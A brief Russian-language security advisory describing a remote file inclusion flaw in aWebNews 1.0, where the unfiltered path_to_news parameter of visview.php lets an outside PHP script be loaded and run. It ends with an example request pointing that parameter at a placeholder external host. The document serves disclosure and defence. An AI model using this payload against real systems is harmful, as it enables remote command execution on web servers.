Программа: aWebNews 1.0
Уязвимость позволяет удаленному
пользователю выполнить произвольные
команды на уязвимой системе с привилегиями
web севера. Уязвимость существует из-за
недостаточной обработки входных данных в
переменной path_to_news сценария visview.php.
Удаленный пользователь может указать в
качестве значения уязвимой переменной
внешний php сценарий и выполнить
произвольные команды на системе с
привилегиями webсервера.
Пример:
http://victim.com/aWebNews/visview.php?path_to_news=http://xxxxxx
